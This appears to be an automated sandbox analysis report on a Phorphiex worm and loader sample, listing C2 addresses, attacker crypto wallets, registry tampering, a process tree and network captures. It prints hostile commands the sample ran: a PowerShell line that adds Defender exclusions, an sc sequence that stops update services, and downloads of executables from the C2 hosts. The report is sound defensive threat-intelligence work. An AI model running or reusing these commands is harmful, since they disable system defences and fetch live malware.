phorphiex | e7be4052b88e0042232a0f96fe91d626fb498d0bf6fcfede7977b4d2e80fb39a

Analysis

max time kernel
149s
max time network
151s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
11/10/2024, 04:19 UTC

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

e7be4052b88e0042232a0f96fe91d626fb498d0bf6fcfede7977b4d2e80fb39a.exe
Size

1.2MB
MD5

643fa87281b1e9993767c18ef0066fa2
SHA1

9628c4a368454e6c56f41090d35337df7ba35263
SHA256

e7be4052b88e0042232a0f96fe91d626fb498d0bf6fcfede7977b4d2e80fb39a
SHA512

d1c1a8389e39d9a56b6420c4dd90a79395acf7f4a3e2247db239fad9078853e6b755d50894cee9a7fb60067b431964bf040552d18186e14b29c642eef8d945c7
SSDEEP

24576:PtdAm9DUi/CR3wCkCiRgoG7hBaHkbEXXeG/jFt5pZTx9wE:lqTytRFk6ek1pfz

Score

10^/10

phorphiex discovery evasion execution loader persistence trojan worm

Malware Config

Extracted

Family

phorphiex

http://185.215.113.66/

http://91.202.233.141/

Wallets

0xCa90599132C4D88907Bd8E046540284aa468a035

TRuGGXNDM1cavQ1AqMQHG8yfxP4QWVSMN6

qph44jx8r9k5xeq5cuf958krv3ewrnp5vc6hhdjd3r

XryzFMFVpDUvU7famUGf214EXD3xNUSmQf

rsXCXBf9SagxV8JfC12d8Bybk84oPdMNN9

AULzfBuUAPfCGAXoG5Vq14aP9s6fx3AH4Z

LTK4xdKPAgFHPLan8kriAD7eY4heyy73mB

MP8GEm8QpYgQYaMo8oM5NQhRBgDGiLZW5Q

4BB7ckkaPTyADc8trtuwDoZxywaR4eNL5cDJ3KBjq9GraN4mUFztf7mLS7WgT7Bh7uPqpjvA4ypVwXKCJ1vvLWWAFvSmDoD

15TssKwtjMtwy4vDLcLsQUZUD2B9f7eDjw85sBNVC5LRPPnC

1BzmrjmKPKSR2hH5BeJySfiVA676E8DYaK

ltc1qt0n3f0t7vz9k0mvcswk477shrxwjhf9sj5ykrp

3PMiLynrGVZ8oEqvoqC4hXD67B1WoALR4pc

3ESHude8zUHksQg1h6hHmzY79BS36L91Yn

DLUzwvyxN1RrwjByUPPzVMdfxNRPGVRMMA

t1J6GCPCiHW1eRdjJgDDu6b1vSVmL5U7Twh

stars125f3mw4xd9htpsq4zj5w5ezm5gags37yxxh6mj

bnb1msyt0djx4ecspfxg5en0ye465kg3kmv9utzml2

bc1ppypcmu3684n648gyj62gjp2rw0xy7w3vwfamatlg29ajp4z52desafa0sr

bc1qc9edl4hzl9jyt8twdad3zjeh2df2znq96tdezd

Attributes

mutex
mmn7nnm8na
user_agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36

Signatures

Modifies security service 2 TTPs 1 IoCs

evasion

Modify Registry

T1112

Windows Service

T1543.003

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Start = "4"	sysppvrdnvs.exe

Phorphiex payload 1 IoCs

resource	yara_rule
behavioral1/files/0x0007000000015d68-12.dat	family_phorphiex

Phorphiex, Phorpiex
Phorphiex or Phorpiex Malware family which infects systems to distribute other malicious payloads such as ransomware, stealers and cryptominers.
worm trojan loader phorphiex

Windows security bypass 2 TTPs 6 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallOverride = "1"	sysppvrdnvs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallDisableNotify = "1"	sysppvrdnvs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusOverride = "1"	sysppvrdnvs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1"	sysppvrdnvs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesOverride = "1"	sysppvrdnvs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1"	sysppvrdnvs.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
2772	powershell.exe

Downloads MZ/PE file
Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Executes dropped EXE 6 IoCs

pid	Process
2400	BBEF.exe
2844	2155721163.exe
2752	sysppvrdnvs.exe
1468	619221830.exe
588	2825713211.exe
2536	866522175.exe

Loads dropped DLL 7 IoCs

pid	Process
1856	e7be4052b88e0042232a0f96fe91d626fb498d0bf6fcfede7977b4d2e80fb39a.exe
2400	BBEF.exe
2400	BBEF.exe
2752	sysppvrdnvs.exe
2752	sysppvrdnvs.exe
2752	sysppvrdnvs.exe
2752	sysppvrdnvs.exe

Windows security modification 2 TTPs 7 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusOverride = "1"	sysppvrdnvs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1"	sysppvrdnvs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesOverride = "1"	sysppvrdnvs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1"	sysppvrdnvs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallOverride = "1"	sysppvrdnvs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallDisableNotify = "1"	sysppvrdnvs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiSpywareOverride = "1"	sysppvrdnvs.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\sysppvrdnvs.exe"	2155721163.exe

Drops file in Windows directory 2 IoCs

description	ioc	Process
File created	C:\Windows\sysppvrdnvs.exe	2155721163.exe
File opened for modification	C:\Windows\sysppvrdnvs.exe	2155721163.exe

Launches sc.exe 5 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
1644	sc.exe
2864	sc.exe
2624	sc.exe
2728	sc.exe
3012	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 12 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	e7be4052b88e0042232a0f96fe91d626fb498d0bf6fcfede7977b4d2e80fb39a.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sysppvrdnvs.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BBEF.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	2155721163.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2772	powershell.exe
1468	619221830.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2772	powershell.exe
Token: SeDebugPrivilege	1468	619221830.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1856 wrote to memory of 2400	1856	e7be4052b88e0042232a0f96fe91d626fb498d0bf6fcfede7977b4d2e80fb39a.exe	31
PID 1856 wrote to memory of 2400	1856	e7be4052b88e0042232a0f96fe91d626fb498d0bf6fcfede7977b4d2e80fb39a.exe	31
PID 1856 wrote to memory of 2400	1856	e7be4052b88e0042232a0f96fe91d626fb498d0bf6fcfede7977b4d2e80fb39a.exe	31
PID 1856 wrote to memory of 2400	1856	e7be4052b88e0042232a0f96fe91d626fb498d0bf6fcfede7977b4d2e80fb39a.exe	31
PID 2400 wrote to memory of 2844	2400	BBEF.exe	33
PID 2400 wrote to memory of 2844	2400	BBEF.exe	33
PID 2400 wrote to memory of 2844	2400	BBEF.exe	33
PID 2400 wrote to memory of 2844	2400	BBEF.exe	33
PID 2844 wrote to memory of 2752	2844	2155721163.exe	34
PID 2844 wrote to memory of 2752	2844	2155721163.exe	34
PID 2844 wrote to memory of 2752	2844	2155721163.exe	34
PID 2844 wrote to memory of 2752	2844	2155721163.exe	34
PID 2752 wrote to memory of 2500	2752	sysppvrdnvs.exe	35
PID 2752 wrote to memory of 2500	2752	sysppvrdnvs.exe	35
PID 2752 wrote to memory of 2500	2752	sysppvrdnvs.exe	35
PID 2752 wrote to memory of 2500	2752	sysppvrdnvs.exe	35
PID 2752 wrote to memory of 2632	2752	sysppvrdnvs.exe	37
PID 2752 wrote to memory of 2632	2752	sysppvrdnvs.exe	37
PID 2752 wrote to memory of 2632	2752	sysppvrdnvs.exe	37
PID 2752 wrote to memory of 2632	2752	sysppvrdnvs.exe	37
PID 2500 wrote to memory of 2772	2500	cmd.exe	39
PID 2500 wrote to memory of 2772	2500	cmd.exe	39
PID 2500 wrote to memory of 2772	2500	cmd.exe	39
PID 2500 wrote to memory of 2772	2500	cmd.exe	39
PID 2632 wrote to memory of 1644	2632	cmd.exe	40
PID 2632 wrote to memory of 1644	2632	cmd.exe	40
PID 2632 wrote to memory of 1644	2632	cmd.exe	40
PID 2632 wrote to memory of 1644	2632	cmd.exe	40
PID 2632 wrote to memory of 2864	2632	cmd.exe	41
PID 2632 wrote to memory of 2864	2632	cmd.exe	41
PID 2632 wrote to memory of 2864	2632	cmd.exe	41
PID 2632 wrote to memory of 2864	2632	cmd.exe	41
PID 2632 wrote to memory of 2624	2632	cmd.exe	42
PID 2632 wrote to memory of 2624	2632	cmd.exe	42
PID 2632 wrote to memory of 2624	2632	cmd.exe	42
PID 2632 wrote to memory of 2624	2632	cmd.exe	42
PID 2632 wrote to memory of 2728	2632	cmd.exe	43
PID 2632 wrote to memory of 2728	2632	cmd.exe	43
PID 2632 wrote to memory of 2728	2632	cmd.exe	43
PID 2632 wrote to memory of 2728	2632	cmd.exe	43
PID 2632 wrote to memory of 3012	2632	cmd.exe	44
PID 2632 wrote to memory of 3012	2632	cmd.exe	44
PID 2632 wrote to memory of 3012	2632	cmd.exe	44
PID 2632 wrote to memory of 3012	2632	cmd.exe	44
PID 2752 wrote to memory of 1468	2752	sysppvrdnvs.exe	46
PID 2752 wrote to memory of 1468	2752	sysppvrdnvs.exe	46
PID 2752 wrote to memory of 1468	2752	sysppvrdnvs.exe	46
PID 2752 wrote to memory of 1468	2752	sysppvrdnvs.exe	46
PID 1468 wrote to memory of 1676	1468	619221830.exe	47
PID 1468 wrote to memory of 1676	1468	619221830.exe	47
PID 1468 wrote to memory of 1676	1468	619221830.exe	47
PID 1468 wrote to memory of 2340	1468	619221830.exe	49
PID 1468 wrote to memory of 2340	1468	619221830.exe	49
PID 1468 wrote to memory of 2340	1468	619221830.exe	49
PID 1676 wrote to memory of 984	1676	cmd.exe	51
PID 1676 wrote to memory of 984	1676	cmd.exe	51
PID 1676 wrote to memory of 984	1676	cmd.exe	51
PID 2340 wrote to memory of 3032	2340	cmd.exe	52
PID 2340 wrote to memory of 3032	2340	cmd.exe	52
PID 2340 wrote to memory of 3032	2340	cmd.exe	52
PID 2752 wrote to memory of 588	2752	sysppvrdnvs.exe	53
PID 2752 wrote to memory of 588	2752	sysppvrdnvs.exe	53
PID 2752 wrote to memory of 588	2752	sysppvrdnvs.exe	53
PID 2752 wrote to memory of 588	2752	sysppvrdnvs.exe	53

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\e7be4052b88e0042232a0f96fe91d626fb498d0bf6fcfede7977b4d2e80fb39a.exe
"C:\Users\Admin\AppData\Local\Temp\e7be4052b88e0042232a0f96fe91d626fb498d0bf6fcfede7977b4d2e80fb39a.exe"
1⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1856
- C:\Users\Admin\AppData\Local\Temp\BBEF.exe
  "C:\Users\Admin\AppData\Local\Temp\BBEF.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2400
- - C:\Users\Admin\AppData\Local\Temp\2155721163.exe
    C:\Users\Admin\AppData\Local\Temp\2155721163.exe
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2844
  - - C:\Windows\sysppvrdnvs.exe
      C:\Windows\sysppvrdnvs.exe
      4⤵
      Modifies security service
      Windows security bypass
      Executes dropped EXE
      Loads dropped DLL
      Windows security modification
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:2752
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:2500
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
        6⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2772
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS /wait
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:2632
      - C:\Windows\SysWOW64\sc.exe
        
        sc stop UsoSvc
        6⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:1644
      - C:\Windows\SysWOW64\sc.exe
        
        sc stop WaaSMedicSvc
        6⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:2864
      - C:\Windows\SysWOW64\sc.exe
        
        sc stop wuauserv
        6⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:2624
      - C:\Windows\SysWOW64\sc.exe
        
        sc stop DoSvc
        6⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:2728
      - C:\Windows\SysWOW64\sc.exe
        
        sc stop BITS /wait
        6⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:3012
    - - C:\Users\Admin\AppData\Local\Temp\619221830.exe
        
        C:\Users\Admin\AppData\Local\Temp\619221830.exe
        5⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:1468
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:1676
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
        7⤵
        
        PID:984
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:2340
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /delete /f /tn "Windows Upgrade Manager"
        7⤵
        
        PID:3032
    - - C:\Users\Admin\AppData\Local\Temp\2825713211.exe
        
        C:\Users\Admin\AppData\Local\Temp\2825713211.exe
        5⤵
        Executes dropped EXE
        
        PID:588
    - - C:\Users\Admin\AppData\Local\Temp\866522175.exe
        
        C:\Users\Admin\AppData\Local\Temp\866522175.exe
        5⤵
        Executes dropped EXE
        
        PID:2536

Network

GET

http://185.215.113.66/pei.exe

e7be4052b88e0042232a0f96fe91d626fb498d0bf6fcfede7977b4d2e80fb39a.exe

Remote address:

185.215.113.66:80

Request

GET /pei.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
Host: 185.215.113.66
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 11 Oct 2024 04:19:55 GMT
Content-Type: application/octet-stream
Content-Length: 9728
Last-Modified: Wed, 15 May 2024 14:33:59 GMT
Connection: keep-alive
ETag: "6644c7d7-2600"
Accept-Ranges: bytes
DNS

twizt.net

BBEF.exe

Remote address:

8.8.8.8:53

Request

twizt.net

IN A

Response

twizt.net

IN A

185.215.113.66
GET

http://twizt.net/newtpp.exe

BBEF.exe

Remote address:

185.215.113.66:80

Request

GET /newtpp.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Host: twizt.net

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 11 Oct 2024 04:19:57 GMT
Content-Type: application/octet-stream
Content-Length: 85504
Last-Modified: Thu, 10 Oct 2024 07:41:50 GMT
Connection: keep-alive
ETag: "6707853e-14e00"
Accept-Ranges: bytes
GET

http://twizt.net/peinstall.php

BBEF.exe

Remote address:

185.215.113.66:80

Request

GET /peinstall.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
Host: twizt.net

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 11 Oct 2024 04:20:02 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
GET

http://185.215.113.66/1

sysppvrdnvs.exe

Remote address:

185.215.113.66:80

Request

GET /1 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
Host: 185.215.113.66

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 11 Oct 2024 04:20:07 GMT
Content-Type: application/octet-stream
Content-Length: 110600
Last-Modified: Wed, 25 Sep 2024 06:10:18 GMT
Connection: keep-alive
ETag: "66f3a94a-1b008"
Accept-Ranges: bytes
GET

http://185.215.113.66/1

sysppvrdnvs.exe

Remote address:

185.215.113.66:80

Request

GET /1 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
Host: 185.215.113.66

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 11 Oct 2024 04:20:08 GMT
Content-Type: application/octet-stream
Content-Length: 110600
Last-Modified: Wed, 25 Sep 2024 06:10:18 GMT
Connection: keep-alive
ETag: "66f3a94a-1b008"
Accept-Ranges: bytes
DNS

www.update.microsoft.com

sysppvrdnvs.exe

Remote address:

8.8.8.8:53

Request

www.update.microsoft.com

IN A

Response

www.update.microsoft.com

IN CNAME

redir.update.msft.com.trafficmanager.net

redir.update.msft.com.trafficmanager.net

IN A

20.109.209.108
GET

http://185.215.113.66/2

sysppvrdnvs.exe

Remote address:

185.215.113.66:80

Request

GET /2 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
Host: 185.215.113.66

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 11 Oct 2024 04:22:07 GMT
Content-Type: application/octet-stream
Content-Length: 8960
Last-Modified: Tue, 01 Oct 2024 22:35:26 GMT
Connection: keep-alive
ETag: "66fc792e-2300"
Accept-Ranges: bytes
GET

http://185.215.113.66/2

sysppvrdnvs.exe

Remote address:

185.215.113.66:80

Request

GET /2 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
Host: 185.215.113.66

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 11 Oct 2024 04:22:08 GMT
Content-Type: application/octet-stream
Content-Length: 8960
Last-Modified: Tue, 01 Oct 2024 22:35:26 GMT
Connection: keep-alive
ETag: "66fc792e-2300"
Accept-Ranges: bytes
GET

http://185.215.113.66/3

sysppvrdnvs.exe

Remote address:

185.215.113.66:80

Request

GET /3 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
Host: 185.215.113.66

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 11 Oct 2024 04:22:14 GMT
Content-Type: application/octet-stream
Content-Length: 16128
Last-Modified: Wed, 25 Sep 2024 06:10:59 GMT
Connection: keep-alive
ETag: "66f3a973-3f00"
Accept-Ranges: bytes
GET

http://185.215.113.66/3

sysppvrdnvs.exe

Remote address:

185.215.113.66:80

Request

GET /3 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
Host: 185.215.113.66

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 11 Oct 2024 04:22:15 GMT
Content-Type: application/octet-stream
Content-Length: 16128
Last-Modified: Wed, 25 Sep 2024 06:10:59 GMT
Connection: keep-alive
ETag: "66f3a973-3f00"
Accept-Ranges: bytes
GET

http://185.215.113.66/4

sysppvrdnvs.exe

Remote address:

185.215.113.66:80

Request

GET /4 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
Host: 185.215.113.66

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 11 Oct 2024 04:22:21 GMT
Content-Type: application/octet-stream
Content-Length: 110600
Last-Modified: Fri, 11 Oct 2024 02:52:45 GMT
Connection: keep-alive
ETag: "670892fd-1b008"
Accept-Ranges: bytes
GET

http://91.202.233.141/dwntbl

sysppvrdnvs.exe

Remote address:

91.202.233.141:80

Request

GET /dwntbl HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
Host: 91.202.233.141

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 11 Oct 2024 04:22:18 GMT
Content-Type: application/octet-stream
Content-Length: 85760
Last-Modified: Thu, 10 Oct 2024 07:40:46 GMT
Connection: keep-alive
ETag: "670784fe-14f00"
Accept-Ranges: bytes

185.215.113.66:80

http://185.215.113.66/pei.exe

http

e7be4052b88e0042232a0f96fe91d626fb498d0bf6fcfede7977b4d2e80fb39a.exe

688 B
10.4kB
8
10

HTTP Request

GET http://185.215.113.66/pei.exe

HTTP Response

200
185.215.113.66:80

http://twizt.net/peinstall.php

http

BBEF.exe

2.4kB
88.7kB
45
68

HTTP Request

GET http://twizt.net/newtpp.exe

HTTP Response

200

HTTP Request

GET http://twizt.net/peinstall.php

HTTP Response

200
185.215.113.66:80

http://185.215.113.66/1

http

sysppvrdnvs.exe

1.6kB
42.1kB
32
34

HTTP Request

GET http://185.215.113.66/1

HTTP Response

200
185.215.113.66:80

http://185.215.113.66/1

http

sysppvrdnvs.exe

2.7kB
114.3kB
56
85

HTTP Request

GET http://185.215.113.66/1

HTTP Response

200
20.109.209.108:80

www.update.microsoft.com

sysppvrdnvs.exe

144 B
92 B
3
2
46.100.164.239:40500

sysppvrdnvs.exe

152 B
3
5.232.135.186:40500

sysppvrdnvs.exe

152 B
3
92.46.136.111:40500

sysppvrdnvs.exe

914 B
1.6kB
13
12
37.151.113.156:40500

sysppvrdnvs.exe

152 B
3
185.215.113.66:80

http://185.215.113.66/2

http

sysppvrdnvs.exe

580 B
9.6kB
9
9

HTTP Request

GET http://185.215.113.66/2

HTTP Response

200
185.215.113.66:80

http://185.215.113.66/3

http

sysppvrdnvs.exe

1.1kB
26.5kB
18
23

HTTP Request

GET http://185.215.113.66/2

HTTP Response

200

HTTP Request

GET http://185.215.113.66/3

HTTP Response

200
185.215.113.66:80

http://185.215.113.66/4

http

sysppvrdnvs.exe

2.1kB
59.0kB
39
46

HTTP Request

GET http://185.215.113.66/3

HTTP Response

200

HTTP Request

GET http://185.215.113.66/4

HTTP Response

200
91.202.233.141:80

http://91.202.233.141/dwntbl

http

sysppvrdnvs.exe

2.0kB
88.7kB
40
66

HTTP Request

GET http://91.202.233.141/dwntbl

HTTP Response

200

8.8.8.8:53

twizt.net

dns

BBEF.exe

55 B
71 B
1
1

DNS Request

twizt.net

DNS Response

185.215.113.66
8.8.8.8:53

www.update.microsoft.com

dns

sysppvrdnvs.exe

70 B
140 B
1
1

DNS Request

www.update.microsoft.com

DNS Response

20.109.209.108
146.70.53.161:40500

sysppvrdnvs.exe

64 B
1
90.156.160.66:40500

sysppvrdnvs.exe

64 B
1
86.62.3.154:40500

sysppvrdnvs.exe

64 B
1
212.120.203.199:40500

sysppvrdnvs.exe

64 B
1
2.133.216.5:40500

sysppvrdnvs.exe

64 B
1
203.99.175.167:40500

sysppvrdnvs.exe

64 B
1
146.120.17.117:40500

sysppvrdnvs.exe

64 B
1
195.158.22.4:40500

sysppvrdnvs.exe

64 B
1
195.158.20.103:40500

sysppvrdnvs.exe

64 B
1
151.243.242.97:40500

sysppvrdnvs.exe

64 B
1
195.158.31.142:40500

sysppvrdnvs.exe

64 B
1
195.181.60.156:40500

sysppvrdnvs.exe

64 B
1
213.230.109.146:40500

sysppvrdnvs.exe

64 B
1
93.188.86.211:40500

sysppvrdnvs.exe

64 B
1
178.205.59.207:40500

sysppvrdnvs.exe

64 B
1
109.166.63.126:40500

sysppvrdnvs.exe

64 B
1
95.57.40.140:40500

sysppvrdnvs.exe

64 B
1
198.163.198.59:40500

sysppvrdnvs.exe

64 B
1
89.236.211.204:40500

sysppvrdnvs.exe

64 B
1

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

System Services

T1569

Service Execution

T1569.002

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\Q4648X1K\1[1]

Filesize
108KB

MD5
1fcb78fb6cf9720e9d9494c42142d885

SHA1
fef9c2e728ab9d56ce9ed28934b3182b6f1d5379

SHA256
